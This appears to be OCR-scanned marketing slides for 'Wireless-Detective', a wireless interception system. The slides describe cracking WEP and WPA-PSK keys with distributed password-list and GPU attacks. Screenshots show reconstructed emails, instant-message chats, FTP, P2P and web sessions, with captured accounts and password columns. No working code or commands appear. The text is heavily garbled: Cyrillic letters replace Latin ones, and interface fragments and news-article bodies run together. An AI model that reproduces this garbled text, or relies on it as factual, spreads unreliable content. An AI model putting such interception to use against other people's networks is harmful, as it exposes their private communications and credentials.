

Available) 

WPA-PSK cracking is an optional module. By using external o 
server with 4 

Smart Password List апа GPU Acceleration Technology, W - 
Р5К Кеу 

сап be recovered/cracked. 

Notes: 

The time taken to decrypt the WEP key by passive mode depends on amount network 
activity. 


The time to crack WPA-PSK key depends on the length and complexity of the key. 


Pacirlac it ic 


Cracking/Decryption of WEP Key 


Automatic: System auto crack/decrypt WEP key (default) 
Manual: Capture raw data and crack/decrypt WEP key 


Я menu ^ Hard Disk Information : - 1466 / Used - 3.36 / Available - 1366 / Available (%) - 97% 

|» ғаға) Capture NForbidder/ Import/ Wepkey/ History/ Compare/ Work Log/ 105/ Import & Export Config 4 

ji : UE UR МОРЕ : ФАР ©STA 

+ IMAP (14) | — | | 

3-3 WEBMAIL (READ). Capture Size : none Notification Filter Save List Refresh: 7 У s. Auto Stop 

+- WEBMAIL (SENT) ( 5 " 

! 'y Channe 

#- № MSN (18) - 

i “ | Manual 

ч ІСО (7) [Manua | 

| eee By Channel + AP 

=- QQ (10) = | - - 

+ d UT (1) AP | SCAN MANUAL BSSID CH. MB/S KEY ST g 
5-45 SKYPE (3) 1| O | Manual |# 00:24:56:00:24:56 | 6 | 54 ng 
3-8 GOOGLETALK (1 [5l = [Ma ]  00-23-54-00.-04.56 |6. —— | =й 
H {вс (2) ( ) 2 © Manual |# 00:23:51:00:24:56 6 54 WEP 1234567890 | 2487 0 WIRE 0 Blocking 
#-@ FTP (22) | E | ‘Sup | 

i 3| © | Manual |в 00:1Е:58:00:24: 7 | 54 WEP 0 1240 OT 0 Воск 

& pp (13) Р 00:24:56 LA locking 
55 САМЕ (3 үү ө лл ткт = B — ER ERES ER 
+ p quee ae (1322) 4|€ Manual |# 00:1E:58:00:1E:58 | 3 | 54 WEP 1 1649 10 sai 0 | Blocking 
+ @ HTTP (CONTENT) (— 5|€ | Manual |# 00:10:7Е:00:1Е:58 | 1 48 WPA 22 8692 63 уе 1 |Blocking 
"ЭШ НТТР (DOWNLOAC 6 | © Маша | e 00:1B:5B:00:1E:58| 2 | 54 | МЕР® 6 1164 12 dun 1 |Blocking 
+- a) HTTP (RECONSTRI - 

“VIDEO STREAM (35 7 | © | Manual |# 00:1В:5В: 00:1Е:58 6 54 | МЈЕРЕ 27 8116 0 2WIRE 0 | Blocking 
888 TELNET (44) 8| © | Manual | 00:18:58:00:1Е:58 | 6 | 54 | WEP 4 395 0 2WI 0 Blocking 

SEARCH 

и WEIN € Manual |Е 00:1А:С4: 00:1A:C4| 6 54 WEP 4 1147 35 2// 0 | Blocking 
S Ш и 10 € Manual |# 00:19:24: 00:14:04 | 6 | 54 WEP 4 1562 3 2WIRE9 0 | Blocking 


Search А i W«12»» Count: 15, Total : 2. In раде 1 | Rows per раде : 10 | Submit Update 


Wireless-Detective - WPA-PSK 


Cracking Sol. 


Router Firewall J 
м. LA Wireless-Detective 


ұғ, я (Slave) 
Au d WPA-PSK 
\ 4 А 
ж ^^ VA \ Cracking 
42, ao “ \ ш 
Ж Fi Ж aes Wireless STA \ Solution 
"AT А ЖЫ \ WPA Handshake 
кы Ar’ 1 packets need to be 
ca, Ғ | nias “У captured for cracking 
Wireless-Detective | | Wireless-Detective Р | WPA key. 
eon prave) Utilize Single Server or 
MN. Wireless STA Wireless-Detective = = 
xc CUNG NN > оао Distributed Servers 
(Master) (multiple smart 
Implementation of Single or Distributed Servers passwo rd list attack 
"1 S8 — simultaneously) to crack 
Raw data packets containing WPA key. 


handshakes packets 


Distributed Password List/Dictionary Cracking Acceleration 
Using GPU Accelerated for WPA-PSK or WPA2-PSK Key Cracking technology: GPU 


Note: WPA handshakes packet can be captured by Standalone WirelessAMee&leyationq, ог 
Distributed Wireless-Detective systems. 


This is an optional feature! Additional system is required! Please contact Decision 
Group for more information. 


Wireless-Detective - WPA-PSK 
Crackinc 


Sol. 
| 


Г 
48 Elcomsoft Wireless Security Auditor ~ са | [2] 
File Action Options Help 
ar pA a- ә 25 
ё à № ы Я Л о о 
Import + Create Open ы Save Start Pause Check for Help 
data project project project attack attack updates contents 
Dictionaries total: 1 Dictionaries left: 0 
Time elapsed: Oy Od Oh:0m:4s Time left: Oy 1d 1h:5m:25s 
Current speed: 507 Average speed: 419 
Last password: 0660 Processor load: 100% 
| english.dic - 0% | 
Ssid Hash Password Status Comment 
cuckoo Running... 


is Is an optional feature! Additional system is requi 
ase contact Decision Group for more informatio 


4 | 


Ш | , 


Time stamp 
10:22:35 March 07, 2010 
10:22:35 March 07, 2010 
10:22:36 March 07, 2010 


Message 

english.dic has been opened successfully 

About to start new recovery: 2 CPU core(s), 0 GPU card(s) ES 
Recovery: started E 


cuckoo 


Reconstruction - Sample Email - 


POP3 


Е 
е https://192.168.10.60/main.php - Windows Internet Explorer | rp cis 
© у= le 09 
File Edit View Favorites 
We Favorites | @ https;//192. 


men ^ CATEGORY : POP3 - 192.168.1.11 
POP3 (66) 
#192 168.1.9 (9) 


NO. 0 DATE / TIMEt FROM TO cc SUBJECT ACCOUNT PASSWORD 


8492 168.1.10 (11) а iniwurmp@bos MD NONE Update your Penis supportQ)... eddecisi... 
8492 168.1.11 (30) 
8192 168.1.33 (14) |, а dakota4824@)j. эр ашыры NONE + Dont put your health at stake! supportQ)... eddecisi... 
8192 168.1.142 | пре = 
M | 2008-07-02 - support@ed- E 
| 5 МНН | 23. 02:28:43 Jessiedoll@! и @ NONE — + Free Yourself Today! supportQ)... eddecisi... 
“Ga IMAP (14) | 24. prede gandong2004@ ipee NONE 4 Only the Beginning... supportQ)... eddecisi... 
9-а WEBMAIL (READ) |= ELI 5... 
"-——— -0/- 2 support@ed- : 2 EE 
Guam умесе cent Э = = рр ес. NONE  4frjsupport()ed-system.sg Keep Stylis.. | support)... eddecisi... 
30- [x “ЕР P Crawler Search >- 
а”. Шен Favorites Tools Нер - - NONE + Staff Placement ѕиррой@... eddecisi... 
teni Ф https.//192:168.10.60/appsrv/eml/1/index.html fh OE) + СО ode v Pager Safetyy Тоок” @- ^ 


NONE + КЕ: Dear support@ed-system.sg 82% ОР... support)... eddecisi... 


Бирроп1@... + Brazil's new drunken driving law sti... support()... eddecisi... 
4| NON Africa support()... eddecisi... 
NONE — + UN finds world economic insecurity а support()... eddecisi... 


ount : 30, Тога! : 2, In page 2| Rows per page: 20 [ Submit | 


| BRASILIA - POLICE have arrested hundreds of Brazilian drivers under a tough пе 
||| are working to overturn the measure and many of their clients are flouting it 


= driving, but bar owners 


F (в most European countries, 


Brazil has some of the world's most dangerous roads, with 7 deaths рег 10,000 сай 
according to the Brazilian Association of Traffic Medicine. | 
| 


An estimated 45 per cent of those 36,000 annual deaths are due to drinking, the grd 5 


la the new іші of 0.2 


The law, which took effect on June 20, effectively bars drivers from drinking and = 
decigrammes of alcohol per litre of blood. The old limit was 0.6 decigrammes. 


Violators face at least а USS600 (55818) fine, a one-year suspension of driving pri 


Heavy drinkers can be imprisoned. 


In 10 davs federal police. who monitors the country's main hichwavs. have arrested some 300 motorists and fined шапу more even thouch experts sav thev are _ 7 & Internet | Protected Mode: Off fg vy 100% + 
Ө Internet | Protected Mode: Off а 7 910% ~ 


Reconstruction - Sample Email - 


SMTP 


@ https//192.168.10.60/main.php - Windows Internet Explorer 


File Edit 
gly Favorites 


View 


| (Е hitps://192.168.10.60/main.php 


Favorites Tools Help 


t я EJ - 


“| de v Раде“ баѓеіу = Tools v ө- dí 


X 


P ~| 


a CATEGORY : SMTP - 192.168.1.11 


NO. 0 DATE / TIMEt FROM 


2008-07-02 
02:34:01 
2008-07-02 
02:30:51 
2008-07-02 
02:30:18 


Bl MENU 

+- POP3 (66) 
T3 SMTP (19) 
#1192 168.1.9 (2) 
8492 168.1.10 (5) 
8492 168.1.11 (3) 
#1192 168.1.33 (8 
#1192 168 (1) 
Ф IMAP (14) 


| 
| 
9 а WEBMAIL (READ) |= 


1. 8 


2. 9 


[E-e 


IK 1 


decision@ed-... 
decision@ed-. 


decision@ed-... 


TO cc 


decision@ed-...  support@... 
decision@ed-... NONE 
support@ed-s... NONE 


Count: 3, Total : 1,1 


BCC 


NONE 


NONE 


NONE 


(tà \\МЕВ E 28216800 ррзгу/ет\ 


=g 


4/index.html - Windows Internet Explorer _ 


Ф hittps://192.168.10.60/appsrv/eml/4/index.htm! 


|| Elle Edit Мем Favorites Tools Help 
+) SE 
са ( 


Ч d v Раде“ Safety» Тооб“ ФУ 


oly Favorites 
#59 YAHQ 
aA 20 ( 
Поти 
H- КУР 
#- $76006 
«|с (2 


ЕЕЕ: 
| 


DATETIME 2008-0720 


Ex-con suspected of killing 8 captured | 
GRANITE CITY (Illinois) - AUTHORITIES say they have captured an ex-convict 


Lieutenant Bill Baker of the St Louis Area Major Case Squad says twenty-eight-ye 
about 16 kilometers north of St Louis, Missouri. He did not immediately have morejl 


А spokeswoman with the Granite City police department says Sheley is in custody 


couple whose blood-soaked dogs were found roaming a motel parking lot. 


year-old died from blunt force trauma to the head. 


Officials said the other victims all appeared to have died in the same manner. 


= City, Illinois 


@ temet | Protected Mode: Of „+ җи + 


The FBI launched a manhunt for Sheley, who they believe is tied to the killings of eight people in Illinois and Missouri, including a 93-year-old man, a child, апда 


Police in Galesburg. in northwestern Illinois, had ealier said that they had a warrant for Sheley?s arrest on charges including first-degree murder, aggravated 
battery and vehicular hijacking in the death of Mr Ronald Randall, whose body was found Monday behind a Galesburg grocery store. An autopsy shows the 65- 


ПП 


4 


Done 


@ Internet | Protected Mode: Off fg v %100% + 
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+ New York 


+ Captured 


SUBJECT 


ge 1 | Rows per page: 


SIZE 


93.5K 


TT.9K 


97.3K 


20 [ Submit | 


otected Mode: Off 


v 
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Reconstruction - Sample Email - IMAP 


Ф https://192.168.10,60/main.php - Windows Internet Explorer ~. ifs) ——À 


©» Ее - 


File Edt View Favorites | 
F Favorites Ф https://192 xu] 
B мени ^ CATEGORY : IMAP - 192.168.1.10 | 
|| = фр POP3 (66) NO. @ DATE / TIME: FROM ACCOUNT PASSWOR 


< SMTP (19) > FERRE 
€ IMAP (14) ps iniwurmp@bos eer NONE + Update your Penis support eddecisi 
B | 2008-07-02 рроп(Фед- 
X - аа (4) 2 -— Py dakota4824 (0j "— м NONE + Dont put your health at stake! supportQ).. eddecisi 
n - e € J 2 
* (SEN 8-07- pport@ed- 
ta WEBMAIL (SENT) | 23. pet йч ]|#551едо\!@! — d NONE + Free Yourself Today! зирроп@ eddecisi... 
* MSN (18 ы $ 
Mmm 2008-0702 „ома епшігуфед = мент 
+ 4 ICa (7) 24 022843  9andong2004Q)... NONE + Only ће Beginning supportQ... eddecisi 
$ YAHOO (22 a 8-07-0 У зиррой@ед- 
Т” 9 v 425. г ; e support@ed-s upportQed NONE  1frj support@ed-system.sg Keep Stylis suppot@... eddecisi... 
https://192.168.10.60/apps 
ae NONE + Staff Placement support)... eddecisi 


| Eile Edit Мем Favorites Tools Help 
sten Ф https//192:168.10.60/appsrv/eml/1/index.html 1 d v Раде“ бау” Тоо” Ө- 


NONE + ЌЕ: Dear support@ed-system.sg 82% OF... supportQ)... eddecisi... 


уррой@... + Brazil's new drunken driving law sti suppot@... eddecisi... 
NONE 4 supportQ).. eddecisi... 
[IE mm ЕЕ NONE + UN finds world economic insecurity а ѕоррой@... eddecisi 


Бе pdt Vew Hee 


ount : 30, Total : 2, Іп page 2 | Rows per page : 20 | Submit 


BRASILIA - POLICE have arrested hundreds of Brazilian drivers under a tough пе en driving, but bar owners 
are working to overturn the measure and many of their clients are flouting it. 


Brazil has some of the world's most dangerous roads, with 7 deaths per 10,000 сай F (в most European countries, 
according to the Brazilian Association of Traffic Medicine. $ 


An estimated 45 per cent of those 36,000 annual deaths are due to drinking, the grd 


The law, which took effect on June 20, effectively bars drivers from drinking and i] A fd the new limit of 0.2 
decigrammes of alcohol per litre of blood. The old limit was 0.6 decigrammes. < 


@ internet | Protected Mode: OF 


Violators face at least а USS600 (55818) fine, a one-year suspension of driving pri 
Heavy drinkers can be imprisoned. 


| In 10 davs federal police. who monitors the country's main hishwavs. have arrested some 300 motorists and fined manv more even though experts sav thev аге 
Ө Internet | Protected Mode: Off Ф 7 %10% ~ 


Reconstruction - Sample Web Mail 


ttps://192.168.1.60/main.php - Windows Internet Explorer 


File Edit View Favorites Tools Нер 
Ye 40 Gbttps:i/192.168.1.60/main.php 


IB) menu 


Ga POP3 (15) NO 
| | #192.168.1.103 (15: 1 
--«$ SMTP (2) 2 
| 8192 168.1.103 (2) 3. 
| IMAP (0) М 


ре WEBMAIL (READ) | 


8492 468.1.103 (11: 
WEBMAIL (ЗЕМТ)( | 6. 


4-4, MSN (11) ; 

"Wd ICQ (0) » 
#3 YAHOO (5) у 0 
Ө aa (0) 11. 
UT UT (0) - 
-$ SKYPE (0) иза 
H- FTP (8) 

H- ме pap (2) 

ЗАМЕ (0) 


[+] 


@ HTTP (LINK) (1500) 
& HTTP (CONTENT) ( 
3 НТТР (DOWNLOAC 
=) HTTP (RECONSTRI 
TELNET (3) 

—@, SEARCH 

- © ALERT 

"fà EXPORT 

89-6) MANAGE 

Su › 


E- 


H-E- 


%- 


~ 


; В https:/192.168.1.60/main.php 


2008-03-0 
2008-03-0 
2008-03-0 
2008-03-0 


2 13:52:11 
2 13:47:59 
2 13:47:32 
2 13:47:32 


2008-03-02 13:47:08 


2008-03-0 
2008-03-0 
2008-03-0 
2008-03-0 
2008-03-0 


2 13:47:08 
2 13:47:08 
2 13:45:16 
2 13:44:26 
2 13:43:40 


+ L] Please open record file 
+ P] Please open record file 
+ [3 Please open record file 
+ L] Please open record file| 
+ F] Please open record file 
+ F] Please open record file 
+ 07 Please open record file 


WEBMAIL(READ) | ІР: 192.168.1.103 | РА), / TIME : 2008-03-02 13:47:08 


Айе Page ~ 


тов - @- Зв аФо з 


- Windows Internet Explorer 


ЕХ) 


FROM :bobierbonier@gmail.com 
DATE / TIME :2008-03-02 13:47:08 


TO :wedetective1@yahoo.com 
CC :wedetective2@yahoo.com 
SUBJECT :U.N. chief condemns Israel after bloody day in Gaza 


UN. chief condemns Israel after bloody 


By Nidal al-Mughrabi 


Islamist militants to stop firing rockets. 


Wednesday 


javascript: ChangeSort('_HOST','ASC’); 


day in Gaza 


Addressing an emergency session of the Security Council in New York after four days of fighting r1 
in which 96 Palestinians have been killed, many of them civilians, Ban also called on Gaza's ` 


САТА (Reuters) - U.N. Secretary-General Ban Ki-moon condemned Israel for using "excessive" force in the Gaza Strip 
and demanded a halt to its offensive after troops killed 61 people on the bloodiest day for Palestinians since the 1980s 


Smoke rise after an 
Israeli missile strike on 


"I condemn Palestinian rocket attacks and call for the immediate cessation of such acts of terrorism," he said. 


The 1.5 million Palestinians crammed into the blockaded, 45 km (30-mile) sliver of coast, enjoyed а house in Gaza March 
a relative respite early on Sunday from Israeli air strikes and raids. Two Israeli soldiers diedina 1.2008 


ground assault on Saturday. An Israeli civilian was killed by a rocket in a border town on (REUTERS Stringer) 


"While recognising Israel's right to defend itself, I condemn the disproportionate and excessive use of force that has killed 
and injured so many civilians, including children ... I call on Israel to cease such attacks," said Ban. 


But with public anger boiling in Israel, there was no sign the government was ready to call off an offensive that took troops 
+ а ~. = "n Ko ада r ++ ла m 


Windows Live 
YAHOO2.0 Mail 
YAHOO2.0 Mail 
YAHOO2.0 Mail 
YAHOO2.0 Mail 
УАНОО2 0 Mail 
YAHOO2.0 Mail 
YAHOO Mail 
YAHOO Mail 
GMail 


БЭ Internet 


‘a Done 


Ө Internet. 


% 100% ~ 


* 100% ~ 


Reconstruction - Sample Web Mail 


e https://192.168,10.60/main.php - Windows Internet Explorer 


| https://192.168.10.60/main.php uw өз”: 


File Edit 
sip Favorites 


View Fa 


ет 


%-Фҙ POP3 (66) 
%-6% SMTP (19) 


E: a WEBMAIL (READ) | 


8492 168.1.9 (3) 
8492 168.1.10 (13) 
8192 168.1.11 (5) 
#1192 168.88.1 


+ ICQ (7) 
*w$ YAHOO (22) 
= @ QQ (10) 

9- UT UT (1) 

3 SKYPE (3) 
‘S'GOOGLETALK (1) 
Ос (2) 

@ FIP = 
H- Я pap (13) 
| [GAME (3) 

5-4 HTTP (LINK) (1322) 
| ш-@ HTTP (CONTENT) ( 
3-434 НТТР (DOWNLOAL 
H- a} НТТР (RECONSTRI 
тӘ” ГЕО STREAM (35 ~ 


n | D 


Search «a 


5 «Ба IMAP (14) 111. 
12.0 


з «ee 


О. @ DATE/TIME 


2008-07-02 
02:28:17 
2008-07-02 
02:27:24 
2008-07-02 
02:25:28 
2008-07-02 
02:24:57 


frankie.deci.. decision@ed-... NONE 


frankie десі... support@ed-s... NONE 


wedetective2... support@ed-s... NONE 


wedetective2 frankie deci NONE 


NONE 


NONE 


NONE 


NONE 


ғ oce 
Ф WEBMAILISENT) [IP : 192.168.111 | DATE / ПМЕ: 2008-07-02 022724. - Windows Internet Expl... сә ПЕ) sss) ЖЕ 
ге. https./1192.1680 0/htp/openwebphpi TVPE-3& AUTO-878. DATETIME=2008-07-02( igi Certificate Error | 22 


FROM :frankie.decision@gmail.com 
DATE / TIME :2008-07-02 02:27:24 


‚Іп page 1 | Rows per раде : 


TO :support@ed-system.sg 
В E esagomic insecurity among rich, poor 


WÍTACHMENT F SIA jpg 


ај 


| 
ME H and poor nations have more in common this уса] 
of economic insecurity. 


| 
Their shared anxiety is largely due to 'trade shocks' from rising oil and food pric | 
financial markets, natural disasters and armed conflicts, the UN said in its annual, 
economic and social trends. released on Tuesday. 


As usual, though, it's the impoverished who fare worse. | Я 
"The food riots that broke out іп a number of countries in early 2008 have laid | 
economic livelihoods for those at the bottom of the development ladder,’ ће тер | 
@ tenet Protected Mode OFF 
Mr Sha Zukang, the U.N. undersecretary-general for economic and social affairs, suggests 
nothing less than “а global New Deal’ or Marshall Plan-like approach to help the world's poor, 
especially the 1 billion people who live on less than 0551 (551.36) a day. 


Under that plan, nations would set aside cash grants that nations could pay to each household, 
something along the lines of the dividends paid to Alaskans each year since 1980 from oil and gas 
money. 


"Such measures аге, of course, fraught with complications and difficulties,’ he says in the report. 
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Ga РОРЗ (66) DATE / TIMEt PARTICIPANTS CONVERSATION COUNTS 
H$ SMTP (19) 1. @ 2008-07-02 02:43:23 wedetective2@hotmail.com wedetective@hotmail.com 9 
фа IMAP (14) 20 2008-06-02 11:27:18 wedetective2@hotmail.com wedetective@hotmail.com 10 
T Ба eee) 74% Count : 2, Total : 1,In page 1 | Коу/в per page : 10 

: 2008-06-02 112718 -\ = Windows Internet Explorer | 

8192 168.1.9 (4) E https//192 16810 60 сін ТЕРДІҢ кашан SANE 06-02 11:77:28 8 OWNER аса 

8192 168.1.10 (6) E 

#1192 168 1.11 (2) NO. DATE / TIME SCREEN NAME FILE NAME SIZE ТҮРЕ MESSAGE 

#1192 168.1 13 (2) 1 20020602 wedetective2@hotmail.com MSN helo 

8192 168.1.33 (3) 2 prison wedetective2@hotmail.com MSN howru? 
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4 prod wedetective@hotmail.com MSN thank you 

n Y YAHOO (22) 5 20060602 wedetective2@hotmail.com MSN alright 
E ә аа (10) 6 prese wedetective@hotmail.com MSN okie 
5 UT UT (1) 7 20020602 wedetective@hotmail.com MSN thank you 
si = SKYPE (3) 8 pota wedetective2@hotmail.com MSN welcome 
+ ~ GOOGLETALK (1) 9 А wedetective2@hotmail.com MSN kk 
ВР ЈАМЕКС (2) -06- 
т IR i FTP (22 10. ocn wedetective2@hotmail.com MSN bye 
i а ) «a1 им Count: 10, Total: 1,In page 1 | Rows рег page : 10 [ Submit ] - 
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8192 168.1.103 (1) NO. 
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#1192 168.1.17 (2) EE 2006-10-21 03:17:39 tom-0102 math 824 CONVERSATION 8 
58192 168.1.51 (3) 1 
Bio 1681530, ШЕН Count: 1, Total: 1,In page 1)Mowsperpage: 20 


8492 168.1.57 (1) 


(2 YAHOO | IP:192.168.1.17 | DATE/ TIME: 2006-10-21 03:17:39 - Windows Internet Explorer 


Æ https:/'/192. 168, 1.60/yahoo/yahoo_msg. php?IDX=3&DATE=2006-10-21%2003: 17:3980WNER=tom-01028WHOM=math_82481P=192,168.1.17 м 4 Certificate Error 
8192 168.1.103 (2) > 
#1192 168.1.17 (1) 
B NO. DATE/TIME SCREEN NAME TYPE MESSAGE STARTTIME END TIME 
жекен анар tom-0102 MESSAGE T 
03:17:39 тс 
~ 2006-10-21 
г 4 > 03:18:20 math 824 
ІП ure 2008-03-03 2006-10-21 2006-10-21 
| 29 SKYPE (0) 16:32:54 math S% 03:17:28 03:19:38 
е9 2008-03-03 Руел 2006-10-21 2006-10-21 
Hy ҒТР (8) 16:32:54 рече 03:17:22 03:19:39 
i 2008-03-03 2006-10-21 2006-10-21 
H- g P2P (2) - 163254 math 824 03:20:13 03:21:16 
ABGAME (0) 2008-03-03 "m 2006-10-21 2006-10-21 
5-48 НТТР (LINK) (1500) ` 163254 TRE 03:20:13 03:21:16 
| 2008-03-03 tees 2006-10-21 2006-10-21 
#-@ HTTP (CONTENT) ( ' 16:32:55 оп 03:28:50 03:29:24 
s нт ром ог E NM г meer 
H" а) HTTP (RECONSTRI TERT Count : 8 , Total: 1 ,Іп раде 1|Rowsperpage: 20 
#9 TELNET (3) 
©, SEARCH Е и 
ine Including Text Chat Messages, File 
<р EXPORT d b 
а. Transfer, VOIP and Webcam 
— REGISTER а = = а 
sessions reconstruction ап 


али = playback 


- Supports Client and Web Yahoo. 


@ Internet * 10095 ~ 


* 100% v 


Reconstruction - Sample File 


Transfer - 


FTP 


E 


[+] [+] 


E 


+ 


[+] 


m- 


+ 


File 


y Favorites | @ https://19 
| H- SKYPE (3) 
Ес 


Edit View Favorites 


‘S"GOOGLETALK (1) 
{вс 


aT IP (22) 
#1192 168.1.10 (9) 
192 168 .1.11 (4) 


AE GAME (3) 
@ HTTP (LINK) (1322) 
@ HTTP (CONTENT) ( 
43g HTTP (DOWNLOAD 
я) HTTP (RECONSTRI 
5З\ЛОЕО STREAM (35 _ 
TELNET (44) 
©, SEARCH 
@ ALERT 
(y EXPORT 
Ча MANAGE 
g! WIRELESS 
- А BACKUP 
<< SYSTEM 
—X9 NETWORK USE 
$8 AUTHORITY SE 
^ DELETE DATA 
~R EDIT PASSWOF ~ 


nm D 


Search «a 


ПЕ https//192.168.10,60/main.php - Windows Internet Explorer) 


NO. DATE/TIMEt ACCOUNT PASSWORD _ ACTION FTP SERVER FILE NAME 
1. “22622: anonymous ІЕ0ѕег@ DownLoad 647.210.151 М DWA-642. ds. pdf 
2. ы anonymous lEUser@ DownLoad 64.7.210.151 [3 05М-32009 8 05 роғ 
3: ERE. anonymous lEUser@ DownLoad 64.7.210.151 I3 DWA-140 Ws.pdf 
д. 20080702 anonymous | IEUserQ DownLoad 617210154. — &DWA-643 Бр 
TEET Count: 4, Total: 1 , Іп page 1 | Rows per раде : 8 [ Submit ] 
ЕРУ ist esa TP RASdsk Ее М 
“БМ — ааа НИ > File Download DE s [Ex] 
[t ue ------ — RS. wc ELD Do you want to open or save this file? 
WHAT THIS PRODUCTDOES | === em Мате: ҒТР AASdSk.pdf 


k — SECURITY «om MKDIR 21" 47" x03" 
+ ИЯ Protected Accoss (WPA, МРАЗ + Packaging МАН 68" хал кт" 


LEDs 
ink 


+ Aetity 


CERTIFICATIONS 
+ FOC Class B. 
+c 


RANGEBOOSTER № ADAPTER 
BENEFITS 


Type: Adobe PDF Reader, 594KB 
From: 192.168.10.60 


| While files from the Intemet can be useful, some files can potentially 
| ham your computer. If you do not trust the source, do not open ог 
save this file. What's the risk? 


v 


@ Internet | Protected Mode: Off fa 


Reconstruction - Sample Peer to 


Реег - Р2Р 


| 


7 


https://192.168.10.60/main.php - Windows Internet Explorer. 


Ооо 


4 


= ДЕСА 
= @ HTTP (LINK) (1322) 
%- HTTP (CONTENT) ( 
#3] НТТР (DOWNLOAL = 
%- а) НТТР (RECONSTRI 


-E 


UT UT (1) 


#44 SKYPE (3) 1. 
&-xS'GOOGLETALK (1) 
&-IROIRC (2) 
8-6} FTP (22) 


= 


#УР2Р (13) 
8492 168.1.10 (5) 
8492 168.1.11 (1) 
#1192 168.1.33 (2) 
#1192 168.1.142 


VIDEO STREAM (35 


[8] 
H TELNET (44) 


—Q, SEARCH 
^49 ALERT 

<р) EXPORT 
8-49 MANAGE 


1% REGISTER 
@ UPGRADE 


-ie LOGOUT 


w һ 


Search 


Ж о 


No. ПАТЕ/ТІМЕТ 


2008-09-22 
01:58:41 
2008-09-22 
01:56:04 
2008-09-22 
01:55:18 
2008-03-29 
07:08:54 
2008-03-29 
07:08:03 


« 1»» 


TOOL FILENAME 
Foxy 1.9.8.0 РАВ Give Me 5 - ... 
Foxy 1.9.8.0 ЖОЛЫМ EX 2. 
Foxy 1.9.8.0 ПЕРА Give Me 5 - ... 
LimeWire/4.16.6 Adobe ОМС 3.0 Converter К... 


LimeWire/4. 16.6 Top of Charts - 2005. wma 
Count: 5, То 


Last Activated 


2008-09-22 01:55:10 


2008-09-22 02:02:18 


2008-09-22 01:55:10 


2008-03-29 07:09:04 


2008-03-29 07:09:04 


:1,In page 1 | Rows per page: 


Throughput Throughput a 


0B 1.2M Detail 
4.6M 0B Detail 
0B 604.6K Detail 
0B 20.8K Detail 
0B 186.7K Detail 


9216811084 У 9) Certificate Error | 


mU чы? 
| File Edit View Favorites Tools Нар | E == 
iy Favorites | @ P2P |192168.110 Fo Bl У СЛ dE + Раде“ Safetyy Toos ФУ ” 
= lILFN&Q7GHOSN2GNBGX35YB5HEOQ6Z 
| No. DATE/TIME ACTION PAP PORT P-PORT Throughput 
|| 1. 2008-03-29 07:08:03 DOWNLOAD 97.96.149.28 57962 9887 2.7K 
2: 2008-03-29 07:09:01 DOWNLOAD 96.242 169.106 57967 24653 40.0K 
5) 2008-03-29 07:09:04 DOWNLOAD 98.210.122.244 57963 19419 44.1K 
4 2008-03-29 07:09:04 DOWNLOAD 68.151.212.254 57956 32106 16.0K 
5: 2008-03-29 07:09:04 DOWNLOAD 70.53.66.69 57964 28488 28.1K 
6 2008-03-29 07:09:04 DOWNLOAD 64.233 237.87 57960 25873 228K 
u 7. 2008-03-29 07:09:04 DOWNLOAD 65.92 159 214 57954 50663 27.4K 
8. 2008-03-29 07:09:04 DOWNLOAD 70.44.65.175 57958 17273 5.5K 
4 1 юм Count: 8, Total: 1, Іп page 1 | Rows per раде : 20 | Submit 
@ Internet | Protected Mode: Off jy 410% ~ 


Including Action (Download/Upload), Peer ІР, 
Port, Peer Port & Throughput 


Q Intern 


et | Protected Mode: Off 


до“ Q10% + 


Reconstruction - Sample HTTP - 


S https://192.168.10.60 
ӨС” 
File Edit View Favorites Tools 


oly Favorites 


Help 


@ https://192.168.10.60/main.php fetyy Тоов” @~ ” 


^ CATEGORY : HTTP(R 


+ 5 YAHOO (22) 

| = @ QQ (10) 

$-IT UT (1) 

5-459 SKYPE (3) 
3-«'GOOGLETALK (1) 
#-{RCIRC (2) 

#-@ ҒТР 22) 


HTTP Content 


Date-Timet 


2008-07-02 02:44:18 
2008-07-02 02:43:00 
2008-07-02 02:38:48 
2008-07-02 02:38:34 
2008-07-02 02:38:30 


E] http-//kaw.t.msn.com/en-sg/home.aspx 


E] http-//sg.insider.msg.yahoo.com/client ad.php 


E] http://digg.com/tools/diggt[& Dynamic ПР: 192168111 | DATE / TIME 2008-07-02 023742 = Windows Internet Explorer ООО ТЕЗ 
(J http://isohunt.com/torrentg [e7hips/285910 5 ERREUR МАНА НОВИНИ езе 367 E s семене Error |2) 


3l http://sg.insider.msg.yaho| “КЁ Мем Favorites Tools нер 


#1192 168.1.9 (49) 
8492 168.1.10 (174) 
#1192 168.1.11 (99) 
8.192 168.1.13 (49) 
8492 168.1.33 (180) 
8192. 168.1.142 pe 


= = = a = = 


TELNET (44) 


©, SEARCH 
© ALERT 
6 EXPORT 


Гань ПАЛАМА 
" 


#-ф HTTP кни (127 


P (RECONSTRIK, 


2008-07-02 02:37:48 
2008-07-02 02:37:47 
2008-07-02 02:37:45 
2008-07-02 02:37:44 
2008-07-02 02:37:42 
2008-07-02 02:36:07 
2008-07-02 02:36:02 
2008-07-02 02:35:18 
2008-07-02 02:35:11 
2008-07-02 02:35:03 
2008-07-02 02:34:58 
2008-07-02 02:34:48 


«12345 м 


ooidoonmrguu2ooouoosom[s 


N 
e 


E] http-//digg.com/tools/diggt 
E] http-//digg.com/tools/diggt 
E] http-//digg.com/tools/diggti 
I3 http://digg.com/tools/diggt}| 
E] http://isohunt.com 
E] http-//www.dlink.com/prod 
E] http://www.dlink.com/prod 
E] http-//www.dlink.com/prod 
E] http://www.dlink.com/prod 
E] http://www.dlink.com/prod 
E] http://www.dlink.com/prod 
E] http://www.dlink.com/prod|| 
Count : 9 


Be Favorites _ Фр У E) ~ С! d = Pager беу" Toke Ө- 29 $£6H53420HG 
ПЕ #Р2Р (13) 2008-07-02 02:38:23 ІЧ http://sg_insider.msg_yaho| - - 
|| = ДРСАМЕ (3) 2008-07-02 02:38:21 H http://sg.insider.msg.yaho| ~~ ~~ “Meelis EEE = 
у | Twitter updates 
н @ НТТР (LINK) (1322) 2008-07-02 02:37:55 (7 http://isohunt.com/torrentg} bera Page 1 of 40 (199 items) 2 3 4 5 __»_»» 


SSL now available for citizens of Dubai (and others)! 


Posted by SecretSquirrel on Jun. 25 
YOU CAN NOW SEARCH SECURELY WITH ISOHUNT.COM 


Worried about having your traffic sniffed? Concerned about privacy? We've got your solution. A connection via ssl allows 
you to communicate with us privately, bypassing caching servers and deep packet inspection hardware. 


hanks in no small part to the work of Spike, we are proud to offer SSL on 2 of our sites. https://isohunt.com 
https://torrentbox.com and https://forums.torrentbox.com are all now valid urls for reaching us. This should mean that 
folks in Dubai, who have recently had to start using an alternate domain of ours, should now be able to visit us directly. If 
you have issues with transparent proxies or mean people snooping on your connection, this should come as fantastic news 
